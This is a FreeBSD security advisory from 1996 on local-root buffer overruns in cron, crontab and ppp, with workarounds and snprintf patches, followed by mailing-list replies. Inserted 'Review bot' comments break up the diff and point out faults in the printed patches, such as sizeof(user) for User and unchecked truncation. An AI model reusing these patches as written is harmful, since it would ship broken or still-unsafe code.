In August of 1996, exploits were discovered in the cron and crontab utilities in FreeBSD. These were fixed in the -current source code pool in August of 1996, but due to a clerical error, were not repaired in the older -stable source code pool used to generate the FreeBSD 2.1.X distributions until 16-Dec-1996.

Recently, yet another buffer overrun was discovered in the cron and crontab utilities in FreeBSD. The problem was corrected on 16-Dec-1996 in both -current and -stable.

Also recently, a similar overrun has been discovered in the ppp utility. This was fixed in both -current and -stable source code pools on 16-Dec-1996.

II.  Problem Description

The programs in question store user-supplied information in internal buffers. There is no range checking on length of the data copied into these buffers. A malicious user may be able to overflow these buffers through the use of command line options or via environment variables and insert and execute their own code fragment which could be used to obtain unauthorized access to the system.

III. Impact

The programs in question may be subverted to allow an unprivileged user to gain root access to the system. These vulnerabilities can only be exploited by individuals with access to the local system.

IV.  Workaround

Setuid programs invoked by the user may have their setuid permissions removed, or their protection attributes modified so unprivileged users may not operate them at all. This may reduce or eliminate some functionality provided by these programs to normal users.

To remove setuid privileges:

crontab:
        # chmod ug-s /usr/bin/crontab

ppp:
        # chmod ug-s /usr/bin/ppp

The cron program is started by the system on every boot. This auto-start may be temporarily disabled, and the running cron program stopped. However, cron is a valuable system utility, so we suggest this as a temporary workaround only.

To stop cron from executing on system boot, edit the /etc/rc file and change the line:

        echo -n ' cron'; cron

so it reads:

        # echo -n ' cron'; cron.

To turn off a running cron, use the ps program to determine the PID of the currently running cron (use "ps") and type:

        # kill

V.   Solution

The following patches fix the vulnerabilities. They should apply cleanly to all FreeBSD 2.1.x systems. They have not been tested with FreeBSD 1.x.
After applying these patches, recompile and re-install the affected utilities. *** usr.sbin/cron/cron/database.c 1994/08/27 13:43:03 1.1.1.1 --- usr.sbin/cron/cron/database.c 1996/09/10 03:38:20 1.3 *************** *** 112,119 **** if (dp->d_name[0] == '.') continue; ! (void) strcpy(fname, dp->d_name); ! sprintf(tabname, CRON_TAB(fname)); process_crontab(fname, fname, tabname, &statbuf, &new_db, old_db); --- 112,119 ---- if (dp->d_name[0] == '.') continue; ! (void)snprintf(fname, sizeof fname, "%s", dp->d_name); ! (void)snprintf(tabname, sizeof tabname, CRON_TAB(fname)); process_crontab(fname, fname, tabname, &statbuf, &new_db, old_db); *** usr.sbin/cron/crontab/crontab.c 1996/04/09 21:23:11 1.3.4.1 --- usr.sbin/cron/crontab/crontab.c 1996/08/05 00:50:02 1.6 *************** *** 167,173 **** ProgramName, optarg); exit(ERROR_EXIT); } ! (void) strcpy(User, optarg); break; case 'l': if (Option != opt_unknown) --- 165,171 ---- ProgramName, optarg); exit(ERROR_EXIT); } ! (void) snprintf(User, sizeof(user), "%s", optarg); break; case 'l': if (Option != opt_unknown) *************** *** 198,204 **** } else { if (argv[optind] != NULL) { Option = opt_replace; ! (void) strcpy (Filename, argv[optind]); } else { usage("file name must be specified for replace"); } --- 196,203 ---- } else { if (argv[optind] != NULL) { Option = opt_replace; ! (void) snprintf(Filename, sizeof(Filename), "%s", ! argv[optind]); } else { usage("file name must be specified for replace"); } *************** *** 480,486 **** ProgramName, Filename); goto done; default: ! fprintf(stderr, "%s: panic: bad switch() in replace_cmd()\n"); goto fatal; } remove: --- 479,486 ---- ProgramName, Filename); goto done; default: ! fprintf(stderr, "%s: panic: bad switch() in replace_cmd()\n", ! ProgramName); goto fatal; } remove: --- usr.sbin/cron/lib/env.c 1994/08/27 13:43:02 1.1.1.1 +++ usr.sbin/cron/lib/env.c 1996/12/16 18:11:57 
@@ -115,7 +115,7 @@ { long filepos; int fileline; - char name[MAX_TEMPSTR], val[MAX_ENVSTR]; + char name[MAX_ENVSTR], val[MAX_ENVSTR]; int fields; filepos = ftell(f); --- usr.sbin/ppp/chat.c 1996/06/10 09:41:45 1.4.4.2 +++ usr.sbin/ppp/chat.c 1996/12/15 20:40:26 @@ -315,7 +315,7 @@ } cp--; } - sprintf(tmp, "%s %s", command, cp); + snprintf(tmp, sizeof tmp, "%s %s", command, cp); (void) MakeArgs(tmp, &vector); pipe(fids); --- usr.sbin/ppp/systems.c 1995/05/30 03:50:58 1.5 +++ usr.sbin/ppp/systems.c 1996/12/15 20:40:26 @@ -75,12 +75,12 @@ cp = getenv("HOME"); if (cp) { SetUserId(); - sprintf(line, "%s/.%s", cp, file); + snprintf(line, sizeof line, "%s/.%s", cp, file); fp = fopen(line, "r"); } if (fp == NULL) { SetPppId(); - sprintf(line, "%s/%s",_PATH_PPP, file); + snprintf(line, sizeof line, "%s/%s", _PATH_PPP, file); fp = fopen(line, "r"); } if (fp == NULL) { 
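Review bot: in the database.c hunk, `(void)snprintf(tabname, sizeof tabname, CRON_TAB(fname))` still hands the expansion of `CRON_TAB(fname)` to snprintf as its format argument, and `fname` was just filled from a spool directory entry name, so the copy is only bounded and format-safe if that macro expands to a string literal with `fname` passed as a separate `%s` argument; the macro body is not in the hunk and should be checked. Neither call looks at the return value, so an entry name too long for `fname` or `tabname` is silently cut and process_crontab() is then called with a different name than the one on disk; comparing the result against `sizeof fname` / `sizeof tabname` and skipping the entry on truncation would close that gap.

Review bot: in the crontab.c hunk at the `'u'` option, the bound in `(void) snprintf(User, sizeof(user), "%s", optarg)` is `sizeof(user)` while the destination is `User`; C identifiers are case-sensitive, so this is either a compile error or, if some other `user` object happens to be in scope, a bound taken from the wrong object. It should read `sizeof(User)`, and a return value of `sizeof(User)` or more is a user name that did not fit and should be rejected with an error rather than silently shortened.

Review bot: in the `opt_replace` hunk of crontab.c, the `(void)` cast on `snprintf(Filename, sizeof(Filename), "%s", argv[optind])` discards the only signal that the name was truncated; a path longer than `Filename` would make crontab read a different file than the one named on the command line. Treat a result of `sizeof(Filename)` or more as an error (usage() is already there for that) instead of continuing with the shortened name.

Review bot: the replace_cmd() hunk supplies the `ProgramName` argument that the `"%s: panic: bad switch() in replace_cmd()\n"` format had been missing, so fprintf no longer pulls an unrelated value off the stack for `%s`; while this file is being touched, a pass over the other `fprintf(stderr, "%s: ...")` calls in crontab.c for the same argument-count mismatch would be worthwhile.

Review bot: in the env.c hunk, widening `name` from MAX_TEMPSTR to MAX_ENVSTR only removes the overflow if whatever fills `name` (not shown in the hunk) can never produce more than one input line's worth of characters, i.e. MAX_ENVSTR; if that is a sscanf or strcpy-style copy, a width tied to `sizeof name` would make the invariant explicit instead of depending on two constants staying equal.

Review bot: in the chat.c hunk, `snprintf(tmp, sizeof tmp, "%s %s", command, cp)` is a correct bound only if `tmp` is declared as an array in this function; if it is a pointer, `sizeof tmp` is the pointer size and the fix is a no-op. The declaration is outside the hunk and should be confirmed. The result is also passed to MakeArgs() unchecked, so an over-long line is executed in truncated form; compare the return value against `sizeof tmp` first and fail the command on truncation.

Review bot: in the systems.c hunk at `@@ -75,12` (and the identical hunk at `@@ -115,12` that follows it), `cp` comes from getenv("HOME") in a setuid program, so bounding the sprintf is the right fix, but the return value is again ignored and the possibly truncated `line` goes straight to fopen(); comparing the result against `sizeof line` and treating the oversize case as "file not found" would avoid opening a path the user did not name. Since the two hunks are the same code, factoring the open into one helper would put that check in a single place.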
@@ -115,12 +115,12 @@ cp = getenv("HOME"); if (cp) { SetUserId(); - sprintf(line, "%s/.%s", cp, file); + snprintf(line, sizeof line, "%s/.%s", cp, file); fp = fopen(line, "r"); } if (fp == NULL) { SetPppId(); /* fix from pdp@ark.jr3uom.iijnet.or.jp */ - sprintf(line, "%s/%s",_PATH_PPP, file); + snprintf(line, sizeof line, "%s/%s", _PATH_PPP, file); fp = fopen(line, "r"); } if (fp == NULL) {

=============================================================================
FreeBSD, Inc.

Web Site:                       http://www.freebsd.org/
Confidential contacts:          security-officer@freebsd.org
PGP Key:                        ftp://freebsd.org/pub/CERT/public_key.asc
Security notifications:         security-notifications@freebsd.org
Security public discussion:     security@freebsd.org

Notice: Any patches in this document may not apply cleanly due to modifications caused by digital signature or mailer software. Please reference the URL listed at the top of this document for original copies of all patches if necessary.
=============================================================================

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMrb4FlUuHi5z0oilAQGCjQP/TcKygSf3CLwfJcPSnsQnc0k5fkF3QZvk
Lp4K7FTua7M0AHHMn4gjpZEqB0+eqxMEGuZ+VXISSoESWyaOSz+hVLmLU2UZDLO0
WWZWw3MM3UeWAzLLXwRPTLN0tQlpQJyqPNH1okb4c/Lx9IugN1wcGfbiTnOF3NaC
d8lhtqcQoi4=
=zAKC
-----END PGP SIGNATURE-----

From owner-freebsd-security Tue Dec 17 14:20:53 1996
Return-Path:
Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id OAA23319 for security-outgoing; Tue, 17 Dec 1996 14:20:53 -0800 (PST)
Received: from isbalham.ist.co.uk (isbalham.ist.co.uk [192.31.26.1]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id OAA23196; Tue, 17 Dec 1996 14:19:18 -0800 (PST)
Received: from gid.co.uk (uucp@localhost) by isbalham.ist.co.uk (8.8.4/8.8.4) with UUCP id WAA12852; Tue, 17 Dec 1996 22:03:44 GMT
Date: Tue, 17 Dec 1996 22:05:13 GMT
Received: from [194.32.164.2] by seagoon.gid.co.uk; Tue, 17 Dec 1996 22:05:13 GMT
X-Sender: rb@194.32.164.1
Message-Id:
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
To: Terry Lambert
From: rb@gid.co.uk (Bob Bishop)
Subject: Re: vulnerability in new pw suite
Cc: proff@iq.org, security@freebsd.org, hackers@freebsd.org
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

>Five gets you ten that he'll just use rlogin instead, and go for root on the new system from the user account, never knowing the user's password (or caring).

Well OK, but that just sounds to me like a(nother) good reason to eschew rlogin and co.

--
Bob Bishop (0118) 977 4017 international code +44 118
rb@gid.co.uk fax (0118) 989 4254 between 0800 and 1800 UK

From owner-freebsd-security Tue Dec 17 16:56:11 1996
Return-Path:
Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id QAA05112 for security-outgoing; Tue, 17 Dec 1996 16:56:11 -0800 (PST)
Received: from bunyip.cc.uq.oz.au (daemon@bunyip.cc.uq.oz.au [130.102.2.1]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id QAA05104 for ; Tue, 17 Dec 1996 16:56:06 -0800 (PST)
Received: (from daemon@localhost) by bunyip.cc.uq.oz.au (8.8.4/8.8.3) id KAA28272; Wed, 18 Dec 1996 10:55:53 +1000
Received: from pandora.devetir.qld.gov.au by ogre.devetir.qld.gov.au (8.7.5/DEVETIR-E0.3a) with ESMTP id KAA28212; Wed, 18 Dec 1996 10:35:19 +1000 (EST)
Received: from netfl15a.devetir.qld.gov.au (netfl15a.devetir.qld.gov.au [167.123.24.12]) by pandora.devetir.qld.gov.au (8.6.10/8.6.12) with ESMTP id KAA26838; Wed, 18 Dec 1996 10:32:47 +1000
Received: from localhost by netfl15a.devetir.qld.gov.au (8.6.8.1/DEVETIR-0.1) id AAA27711; Wed, 18 Dec 1996 00:30:41 GMT
Message-Id: <199612180030.AAA27711@netfl15a.devetir.qld.gov.au>
X-Mailer: exmh version 2.0alpha 12/3/96
To: Snob Art Genre
cc: freebsd-security@freebsd.org
Subject: Re: sendmail...
In-reply-to: Your message of "Tue, 17 Dec 1996 00:59:36 PST."
X-Face: 3}heU+2?b->-GSF-G4T4>jEB9~FR(V9lo&o>kAy=Pj&;oVOc<|pr%I/VSG"ZD32J>5gGC0N
 7gj]^GI@M:LlqNd]|(2OxOxy@$6@/!,";-!OlucF^=jq8s57$%qXd/ieC8DhWmIy@J1AcnvSGV\|*!
 >Bvu7+0h4zCY^]{AxXKsDTlgA2m]fX$W@'8ev-Qi+-;%L'CcZ'NBL!@n?}q!M&Em3*eW7,093nOeV8
 M)(u+6D;%B7j\XA/9j4!Gj~&jYzflG[#)E9sI&Xe9~y~Gn%fA7>F:YKr"Wx4cZU*6{^2ocZ!YyR
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Date: Wed, 18 Dec 1996 10:30:41 +1000
From: Stephen Hocking
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

> 
> Ben
> 
> The views expressed above are not those of the Worker's Compensation Board of Queensland, Australia.
> 
> 

Ben, how in Hades did you manage to grab my .sig?

Stephen
--
The views expressed above are not those of the Worker's Compensation Board of Queensland, Australia.

From owner-freebsd-security Tue Dec 17 16:57:57 1996
Return-Path:
Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id QAA05192 for security-outgoing; Tue, 17 Dec 1996 16:57:57 -0800 (PST)
Received: from narcissus.ml.org (brosenga.st.pitzer.edu [134.173.120.201]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id QAA05186 for ; Tue, 17 Dec 1996 16:57:54 -0800 (PST)
Received: (from ben@localhost) by narcissus.ml.org (8.7.5/8.7.3) id QAA04088; Tue, 17 Dec 1996 16:57:45 -0800 (PST)
Date: Tue, 17 Dec 1996 16:57:45 -0800 (PST)
From: Snob Art Genre
To: Stephen Hocking
cc: freebsd-security@freebsd.org
Subject: Re: sendmail...
In-Reply-To: <199612180030.AAA27711@netfl15a.devetir.qld.gov.au>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

On Wed, 18 Dec 1996, Stephen Hocking wrote:

> > 
> > Ben
> > 
> > The views expressed above are not those of the Worker's Compensation Board of Queensland, Australia.
> > 
> > 
> 
> Ben, how in Hades did you manage to grab my .sig?
> 
> 
> Stephen
> --
> The views expressed above are not those of the Worker's Compensation Board of Queensland, Australia.
> 
> 

Oh -- heh, well, I figured it was true for me too, and kind of funny, so I used it. I probably should have asked you. If you mind, I'll stop using it.

Ben

The views expressed above are not those of the Worker's Compensation Board of Queensland, Australia.

From owner-freebsd-security Wed Dec 18 09:08:30 1996
Return-Path:
Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id JAA15882 for security-outgoing; Wed, 18 Dec 1996 09:08:30 -0800 (PST)
Received: from saturn.yars.free.net (saturn.yars.free.net [193.233.48.78]) by freefall.freebsd.org (8.8.4/8.8.4) with SMTP id JAA15815 for ; Wed, 18 Dec 1996 09:08:11 -0800 (PST)
Received: by saturn.yars.free.net id UAA00404; (8.6.12/vak/1.9) Wed, 18 Dec 1996 20:07:59 +0300
Date: Wed, 18 Dec 1996 20:07:59 +0300
From: aiv@saturn.yars.free.net (Igor V. Alekseev)
Message-Id: <199612181707.UAA00404@saturn.yars.free.net>
To: freebsd-security@freebsd.org
Subject: stopping users from rebooting with ctr-alt-del
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

Hello,

What would you recommend to stop users (and anyone who happens to be near the computer) from rebooting it by hitting ctr-alt-del?

TIA,
Igor V. Alekseev

From owner-freebsd-security Wed Dec 18 10:12:17 1996
Return-Path:
Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id KAA19841 for security-outgoing; Wed, 18 Dec 1996 10:12:17 -0800 (PST)
Received: from rocky.mt.sri.com (rocky.mt.sri.com [206.127.76.100]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id KAA19835 for ; Wed, 18 Dec 1996 10:12:14 -0800 (PST)
Received: (from nate@localhost) by rocky.mt.sri.com (8.7.5/8.7.3) id LAA15232; Wed, 18 Dec 1996 11:11:23 -0700 (MST)
Date: Wed, 18 Dec 1996 11:11:23 -0700 (MST)
Message-Id: <199612181811.LAA15232@rocky.mt.sri.com>
From: Nate Williams
To: aiv@saturn.yars.free.net (Igor V. Alekseev)
Cc: freebsd-security@freebsd.org
Subject: Re: stopping users from rebooting with ctr-alt-del
In-Reply-To: <199612181707.UAA00404@saturn.yars.free.net>
References: <199612181707.UAA00404@saturn.yars.free.net>
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

> What would you recommend to stop users (and anyone who happens to be near the computer) from rebooting it by hitting ctr-alt-del?

Install a keymap that doesn't have the reboot function mapped to any key (this won't keep them from rebooting it during bootup), or modify the default keymap to remove the reboot function.

Nate

From owner-freebsd-security Wed Dec 18 11:05:32 1996
Return-Path:
Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id LAA21973 for security-outgoing; Wed, 18 Dec 1996 11:05:32 -0800 (PST)
Received: from nchp4601.nosc.mil (nchp4601.nosc.mil [198.253.27.23]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id LAA21967 for ; Wed, 18 Dec 1996 11:05:29 -0800 (PST)
Received: by nchp4601.nosc.mil (1.37.109.20/16.2) id AA217465923; Wed, 18 Dec 1996 14:05:23 -0500
Date: Wed, 18 Dec 1996 14:05:23 -0500 (EST)
From: Bryan Swann
To: freebsd-security@freebsd.org
Subject: Re: stopping users from rebooting with ctr-alt-del
In-Reply-To: <199612181707.UAA00404@saturn.yars.free.net>
Message-Id:
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

On Wed, 18 Dec 1996, Igor V. Alekseev wrote:

> 
> Hello,
> 
> What would you recommend to stop users (and anyone who happens to be near the computer) from rebooting it by hitting ctr-alt-del?
> 

Gunfire, lethal injection, and electrocution. In that order.

From owner-freebsd-security Wed Dec 18 14:31:55 1996
Return-Path:
Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id OAA02253 for security-outgoing; Wed, 18 Dec 1996 14:31:55 -0800 (PST)
Received: from mexico.brainstorm.eu.org (root@mexico.brainstorm.fr [193.56.58.253]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id OAA02235 for ; Wed, 18 Dec 1996 14:31:49 -0800 (PST)
Received: from brasil.brainstorm.eu.org (brasil.brainstorm.fr [193.56.58.33]) by mexico.brainstorm.eu.org (8.7.5/8.7.3) with ESMTP id XAA08751 for ; Wed, 18 Dec 1996 23:31:38 +0100
Received: (from uucp@localhost) by brasil.brainstorm.eu.org (8.6.12/8.6.12) with UUCP id XAA20822 for freebsd-security@freebsd.org; Wed, 18 Dec 1996 23:31:11 +0100
Received: (from roberto@localhost) by keltia.freenix.fr (8.8.4/keltia-uucp-2.9) id XAA19287; Wed, 18 Dec 1996 23:24:54 +0100 (CET)
Message-ID:
Date: Wed, 18 Dec 1996 23:24:54 +0100
From: roberto@keltia.freenix.fr (Ollivier Robert)
To: freebsd-security@freebsd.org
Subject: Re: stopping users from rebooting with ctr-alt-del
References: <199612181707.UAA00404@saturn.yars.free.net>
X-Mailer: Mutt 0.54
Mime-Version: 1.0
X-Operating-System: FreeBSD 3.0-CURRENT ctm#2815
In-Reply-To: <199612181707.UAA00404@saturn.yars.free.net>; from Igor V. Alekseev on Dec 18, 1996 20:07:59 +0300
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

According to Igor V. Alekseev:
> (and anyone who happens to be near the computer) from rebooting it by hitting ctr-alt-del?

For now, it means removing the "boot" entries in /usr/share/keymaps/whatever.kbd you're using. There was some talk to make it a sysctl(8) variable but nothing happened.

--
Ollivier ROBERT -=- The daemon is FREE! -=- roberto@keltia.freenix.fr
FreeBSD keltia.freenix.fr 3.0-CURRENT #31: Tue Dec 3 23:52:58 CET 1996

From owner-freebsd-security Wed Dec 18 22:11:13 1996
Return-Path:
Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id WAA02806 for security-outgoing; Wed, 18 Dec 1996 22:11:13 -0800 (PST)
Received: from bitbucket.edmweb.com (bitbucket.edmweb.com [204.244.190.9]) by freefall.freebsd.org (8.8.4/8.8.4) with SMTP id WAA02801 for ; Wed, 18 Dec 1996 22:11:10 -0800 (PST)
Received: (from steve@localhost) by bitbucket.edmweb.com (8.6.12/8.6.12) id WAA03056; Wed, 18 Dec 1996 22:11:09 -0800
Date: Wed, 18 Dec 1996 22:11:05 -0800 (PST)
From: Steve Reid
To: FreeBSD Security List
Subject: cron [FreeBSD-SA-96:20.stack-overflow]
In-Reply-To: <199612172007.VAA03986@gvr.win.tue.nl>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

> Topic: unauthorized access via buffer overruns
> cron, crontab, ppp
> Category: core
> Module: cron, crontab, ppp

What is the nature of the problem with cron? If a user doesn't have
access to crontab files, can they somehow cause buffer overflows in the
running process???

From owner-freebsd-security Thu Dec 19 00:12:34 1996
Return-Path:
Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id AAA08025 for security-outgoing; Thu, 19 Dec 1996 00:12:34 -0800 (PST)
Received: from gw-nl1.philips.com (gw-nl1.philips.com [192.68.44.33]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id AAA08019 for ; Thu, 19 Dec 1996 00:12:32 -0800 (PST)
Received: (from nobody@localhost) by gw-nl1.philips.com (8.6.10/8.6.10-0.994n-08Nov95) id JAA17145; Thu, 19 Dec 1996 09:12:24 +0100
Received: from unknown(130.139.36.3) by gw-nl1.philips.com via smap (V1.3+ESMTP) with ESMTP id sma016984; Thu Dec 19 09:11:37 1996
Received: from bsd.lss.cp.philips.com (bsd.lss.cp.philips.com [130.144.199.33]) by smtprelay.nl.cis.philips.com (8.6.10/8.6.10-1.2.1m-961216) with SMTP id JAA23120; Thu, 19 Dec 1996 09:11:36 +0100
Received: by bsd.lss.cp.philips.com (8.8.3/1.63) id JAA27696; Thu, 19 Dec 1996 09:11:36 +0100 (MET)
From: Guido.vanRooij@nl.cis.philips.com (Guido van Rooij)
Message-Id: <199612190811.JAA27696@bsd.lss.cp.philips.com>
Subject: Re: cron [FreeBSD-SA-96:20.stack-overflow]
To: steve@edmweb.com (Steve Reid)
Date: Thu, 19 Dec 1996 09:11:36 +0100 (MET)
Cc: security@freebsd.org
In-Reply-To: from Steve Reid at "Dec 18, 96 10:11:05 pm"
X-Mailer: ELM [version 2.4ME+ PL22 (25)]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

Steve Reid wrote:
> > Topic: unauthorized access via buffer overruns
> > cron, crontab, ppp
> > Category: core
> > Module: cron, crontab, ppp
>
> What is the nature of the problem with cron? If a user doesn't have
> access to crontab files, can they somehow cause buffer overflows in the
> running process???
>

If a user is allowed to run crontab you are in trouble. See the exploits
recently posted on various lists, among which this list and Bugtraq.

-Guido

From owner-freebsd-security Thu Dec 19 01:53:59 1996
Return-Path:
Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id BAA13223 for security-outgoing; Thu, 19 Dec 1996 01:53:59 -0800 (PST)
Received: from rhiannon.clari.net.au (dns1.clari.net.au [203.27.85.9]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id BAA13218 for ; Thu, 19 Dec 1996 01:53:55 -0800 (PST)
Received: (from root@localhost) by rhiannon.clari.net.au (8.7.5/8.6.12) id VAA06675 for freebsd-security@freebsd.org; Thu, 19 Dec 1996 21:04:10 +1100 (EST)
Date: Thu, 19 Dec 1996 21:04:10 +1100 (EST)
From: Peter Hawkins
Message-Id: <199612191004.VAA06675@rhiannon.clari.net.au>
To: freebsd-security@freebsd.org
Subject: subscribe
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

subscribe

From owner-freebsd-security Fri Dec 20 03:53:15 1996
Return-Path:
Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id DAA17365 for security-outgoing; Fri, 20 Dec 1996 03:53:15 -0800 (PST)
Received: from pir.net (moek.pir.net [158.43.129.42]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id DAA17360 for ; Fri, 20 Dec 1996 03:53:13 -0800 (PST)
Received: (from pir@localhost) by pir.net (8.8.4/6.6.6) id LAA03542 for freebsd-security@freebsd.org; Fri, 20 Dec 1996 11:54:07 GMT
Date: Fri, 20 Dec 1996 11:54:07 GMT
From: Peter Radcliffe
Message-Id: <199612201154.LAA03542@pir.net>
To: freebsd-security@freebsd.org
Subject: Re: stopping users from rebooting with ctr-alt-del
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

roberto@keltia.freenix.fr (Ollivier Robert)
> According to Igor V. Alekseev:
> > (and anyone who happens to be near the computer)
> > from rebooting it by hitting ctr-alt-del?
>
> For now, it means removing the "boot" entries in
> /usr/share/keymaps/whatever.kbd you're using. There was some talk to make
> it a sysctl(8) variable but nothing happened.

Something I wondered if was the case (but it isn't) and IMO would be good
is to not allow control-alt-delete if your console/vttys are marked as
'insecure' ...

Peter.

From owner-freebsd-security Fri Dec 20 06:38:45 1996
Return-Path:
Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id GAA22046 for security-outgoing; Fri, 20 Dec 1996 06:38:45 -0800 (PST)
Received: from perky.gothic.net.au (root@perky.gothic.net.au [203.24.16.61]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id GAA22041 for ; Fri, 20 Dec 1996 06:38:29 -0800 (PST)
Received: (from sean@localhost) by perky.gothic.net.au (8.8.3/8.6.12) id BAA03599; Sat, 21 Dec 1996 01:38:25 +1100 (EST)
Date: Sat, 21 Dec 1996 01:38:24 +1100 (EST)
From: Sean Winn
To: freebsd-security@freebsd.org
Subject: Re: stopping users from rebooting with ctr-alt-del
In-Reply-To: <199612201154.LAA03542@pir.net>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

Just a simple question concerning the use of Ctrl-Alt-Del; would it be
possible to make the reboot usable only if root was logged into the
currently visible vty? Not being that cluey on the internals of the
FreeBSD console, it's more a curiosity question than anything. A
definitive "yes/no/damned if I know" from those who *are* capable of
answering would save a relative novice hacker from wasting time :)

I can already see a nice simple problem, in that it would only work after
login...if you need to shutdown because you can't login for some reason
(exhausted swap space because of a nasty process?), then this makes things
difficult...but it should help machines in public places around people who
have too much curiosity.

-- 
Sean Winn email: sean@gothic.net.au, sean@cynet.net.au
All opinions valued at $0.02, and not subject to inflation.

From owner-freebsd-security Fri Dec 20 07:06:03 1996
Return-Path:
Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id HAA22676 for security-outgoing; Fri, 20 Dec 1996 07:06:03 -0800 (PST)
Received: from postoffice.cso.uiuc.edu (postoffice.cso.uiuc.edu [128.174.5.11]) by freefall.freebsd.org (8.8.4/8.8.4) with SMTP id HAA22671 for ; Fri, 20 Dec 1996 07:06:02 -0800 (PST)
Received: from alecto.physics.uiuc.edu (alecto.physics.uiuc.edu [128.174.83.167]) by postoffice.cso.uiuc.edu (8.6.12/8.6.12) with ESMTP id JAA97746; Fri, 20 Dec 1996 09:06:00 -0600
Received: by alecto.physics.uiuc.edu (940816.SGI.8.6.9/940406.SGI) id JAA23349; Fri, 20 Dec 1996 09:04:45 -0600
From: igor@alecto.physics.uiuc.edu (Igor Roshchin)
Message-Id: <199612201504.JAA23349@alecto.physics.uiuc.edu>
Subject: Re: stopping users from rebooting with ctr-alt-del
To: sean@perky.gothic.net.au (Sean Winn)
Date: Fri, 20 Dec 1996 09:04:45 -0600 (CST)
Cc: freebsd-security@freebsd.org
In-Reply-To: from "Sean Winn" at Dec 21, 96 01:38:24 am
X-Mailer: ELM [version 2.4 PL24]
Content-Type: text
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

>
> I can already see a nice simple problem, in that it would only work after
> login...if you need to shutdown because you can't login for some reason
> (exhausted swap space because of a nasty process?), then this makes things
> difficult...but it should help machines in public places around people who
> have too much curiosity.
>

Why would you need to use ctrl-alt-del to reboot the machine?
1. it's not a shutdown (it doesn't resync, anyhow)
2. if you need to "reboot" it no matter what -
   use the power switch, or "reset" button if one is present.

Maybe I am wrong, but I don't see a big difference [for Unix]
between ctrl-alt-del and "reset".

In a public place I would also disable "reset" and "power" button
(I've seen so many times how our HPs were rebooted by users)

IgoR
aka StR

From owner-freebsd-security Fri Dec 20 07:22:58 1996
Return-Path:
Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id HAA23113 for security-outgoing; Fri, 20 Dec 1996 07:22:58 -0800 (PST)
Received: from narcissus.ml.org (brosenga.st.pitzer.edu [134.173.120.201]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id HAA23108 for ; Fri, 20 Dec 1996 07:22:55 -0800 (PST)
Received: (from ben@localhost) by narcissus.ml.org (8.7.5/8.7.3) id HAA08795; Fri, 20 Dec 1996 07:22:54 -0800 (PST)
Date: Fri, 20 Dec 1996 07:22:54 -0800 (PST)
From: Snob Art Genre
To: Igor Roshchin
cc: Sean Winn , freebsd-security@FreeBSD.org
Subject: Re: stopping users from rebooting with ctr-alt-del
In-Reply-To: <199612201504.JAA23349@alecto.physics.uiuc.edu>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-security@FreeBSD.org
X-Loop: FreeBSD.org
Precedence: bulk

On Fri, 20 Dec 1996, Igor Roshchin wrote:

> >
> > I can already see a nice simple problem, in that it would only work after
> > login...if you need to shutdown because you can't login for some reason
> > (exhausted swap space because of a nasty process?), then this makes things
> > difficult...but it should help machines in public places around people who
> > have too much curiosity.
> >
>
> Why would you need to use ctrl-alt-del to reboot the machine?
> 1. it's not a shutdown (it doesn't resync, anyhow)

I believe this is incorrect.

> 2. if you need to "reboot" it no matter what -
> use the power switch, or "reset" button if one is present.
> Maybe I am wrong, but I don't see a big difference [for Unix]
> between ctrl-alt-del and "reset".

I think ctrl-alt-del syncs buffers and otherwise shuts down the machine
